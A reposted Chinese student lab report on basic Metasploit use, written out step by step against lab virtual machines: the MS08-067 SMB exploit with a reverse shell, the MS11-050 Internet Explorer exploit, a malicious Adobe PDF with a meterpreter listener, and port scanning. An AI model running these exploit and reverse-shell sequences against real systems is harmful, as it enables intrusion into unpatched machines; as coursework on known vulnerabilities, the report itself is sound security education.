# 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

最新推荐文章于 2024-10-02 08:00:00 发布
最新推荐文章于 2024-10-02 08:00:00 发布
阅读量156 收藏 1
点赞数
文章标签: 网络 操作系统 运维
原文链接:http://www.cnblogs.com/rhl20155319/p/8979680.html
版权

2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode
  • exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。
  • payload:攻击载荷,如后门等攻击代码。

  • encode:用来编码,用于伪装

    实践过程记录

    1.Windows服务渗透攻击——MS08-067安全漏洞
①攻击机:kali ②靶机:windows XP SP3(English)

可以ping通。
1071560-20180502124642897-1639714681.png

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf >search ms08-067//使用search命令搜寻有关漏洞MS08_067的相关信息
    1071560-20180502124719670-628949267.png

  • msf > use exploit/windows/smb/ms08_067_netapi

  • msf exploit(ms08_067_netapi)> show payloads//查看可以供我们使用的payload:
    1071560-20180502124752979-388501223.png

  • msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp //tcp反向回连
  • msf exploit(ms08_067_netapi)> set LHOST 192.168.72.131攻击者ip
  • msf exploit(ms08_067_netapi)> set LPORT 5319
  • msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135 //靶机ip

  • msf exploit(ms08_067_netapi)> set target 0 //自动选择目标系统类型
    1071560-20180502124807874-947994880.png

  • msf exploit(ms08_067_netapi) > exploit

  • 成功!攻击结果如下:
    1071560-20180502124821361-1385218571.png

1071560-20180502124827594-69330501.png

1071560-20180502124910418-1780050746.png

2.浏览器渗透攻击——MS11-050
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use windows/browser/ms11_050_mshtml_cobjectelement
  • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
  • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131 //攻击机ip
  • msf exploit(ms11_050_cobjectelement) > set LPORT 5319 //攻击端口固定
  • msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19 //统一资源标识符路径设置
  • msf exploit(ms11_050_cobjectelement) > exploit

  • 成功得到Local ip:
    1071560-20180502124925963-164453886.png

  • 用靶机访问http://192.168.72.131:8080/rhl19 ,出现了弹窗警告:
    1071560-20180502124934962-411239696.png

1071560-20180502124942498-2012048901.png

  • 尝试修改一下ie浏览器的相关设置,降低其安全等级
    1071560-20180502124950850-1714847881.png

  • 第二次在IE中访问以上网址还是失败了...很难受...
    1071560-20180502125000733-1240570192.png

3.针对客户端的攻击Adobe
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • msf > use windows/fileformat/adobe_cooltype_sing
  • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
  • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 //攻击机ip
  • msf exploit(adobe_cooltype_sing) > set LPORT 5319 //攻击端口
  • msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf //设置生成pdf文件的名字
  • msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 成功生成pdf。
    1071560-20180502125019316-1327284462.png

  • 由于生成的文件是隐藏文件使用copy命令把其复制到别的目录中去。
    1071560-20180502125028633-1574970828.png

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(handler) > set LPORT 5319 //攻击端口固定
msf exploit(handler) > exploit
  • 再把靶机上打开pdf文件,回连成功。
    1071560-20180502125046356-415506692.png

1071560-20180502125057353-470380119.png

4.Metasploit之——信息收集模块

一、扫描端口

  • msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
  • msf auxiliary(syn) > show options
  • msf auxiliary(syn) > set RHOSTS 192.168.72.137(目标)
  • msf auxiliary(syn) > set THREADS 50(线程)
  • msf auxiliary(syn) > exploit
    由于扫描时间比较长,提前终止了。
    1071560-20180502125107375-1952952858.png

二、扫描靶机的TCP端口使用情况

  • 输入以下指令:
    1071560-20180502125116326-1888873917.png

  • run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况

    实践总结及体会

    本次实验没有什么特别难的地方,主要在环境的配置上,自己配置了好久但还是不成功,最后拷了配置好的虚拟机。体会到了metasploit攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。必须要在特定环境和特定触发条件下才能成功。感受到了实践和真实攻击的差距。

转载于:https://www.cnblogs.com/rhl20155319/p/8979680.html

weixin_34413802
关注
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 399
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Metasploit小技巧
weixin_30443813的博客
08-07 305
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
msfconsole使用 hosts 命令
酷狗直播-锦凡歆的博客
04-26 1477
使用 hosts 命令 既然数据库中有了数据,就可以使用hosts命令来显示当前工作区中存储的所有主机了。 msf > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- ---...
2017-2018-2 20155327『网络对抗技术Exp5MSF基础应用
weixin_30483013的博客
05-07 141
2017-2018-2 20155327『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。 payload:攻击载荷,如后门等攻击代码。 encode:用来编码,用于伪装 实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 ①攻击机:kali ...
# 2017-2018-2 20155319网络对抗技术』Exp6:信息收集与漏洞扫描
weixin_33845477的博客
05-07 153
2017-2018-2 20155319网络对抗技术』Exp6:信息收集与漏洞扫描 实践内容 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 基础问题 哪些组织负责DNS,IP的管理? 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的...
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用
weixin_34008933的博客
04-17 197
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用 ————————CONTENTS———————— 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 2.浏览器渗透攻击——MS11-050 3.针对Office软件的渗透攻击——MS10-087 4.针对Adobe R...
2017-2018-2 20155310『网络对抗技术Exp5MSF基础应用
weixin_30955341的博客
05-03 128
2017-2018-2 20155310『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞 payload:攻击载荷,如后门等攻击代码。 encode:指编码,对我们的程序或代码进行伪装。 实验内容 一个主动攻击实践,如ms08_067 1.启用...
2017-2018-2 20155224『网络对抗技术Exp5MSF基础应用
weixin_34345753的博客
05-06 113
基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。 payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,...
2017-2018-2 20155315《网络对抗技术Exp5MSF基础应用
weixin_30472035的博客
04-27 138
实验目的 学会用metasploit进行简单的攻击操作 教程 实验内容 metasploit中有六个模块分别是 渗透攻击模块(Exploit Modules) 辅助模块(Auxiliary Modules 攻击载荷(Payload Modules) 空字段模块(Nop Modules) 编码模块(Encoders) 后渗透攻击模块(Post) 本次实验使用的是exploit和auxiliar...
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 574
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 721
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
20194307肖江宇exp-1
MYRLY的博客
03-17 3163
20194307肖江《网络对抗技术》 exp1 逆向与Bof基础
20221902 2022-2023-2 《网络攻防实践》第六次作业
xiannvyeye的博客
04-15 384
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
使用socket编程来实现一个简单的C/S模型(TCP协议)
最新发布
caiji0169的博客
10-02 1019
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1062
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 838
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
网络层——IP
weixin_74269833的博客
09-28 1157
由32位二进制数组成,通常用点分的形式被分为四个部分,每个部分1byte,最大值为255。从功能的角度看,ip地址由两部分组成,网络号和主机号。网络号标识了ip所在的网段,主机号标识了在该网段中的唯一的一台主机。二者的区分又需要与掩码配合使用,例如192.168.1.2/24,24表示掩码255.255.255.0,将掩码与ip进行按位与操作,获得了192.168.1.0即为该主机所在网段。将IP地址中的主机地址全部设为0, 就成为了网络号, 代表这个局域网。
QEMU 用户网络与桥接网络设置总结
aspirestro三水问海的博客
09-28 453
QEMU 用户网络与桥接网络设置总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值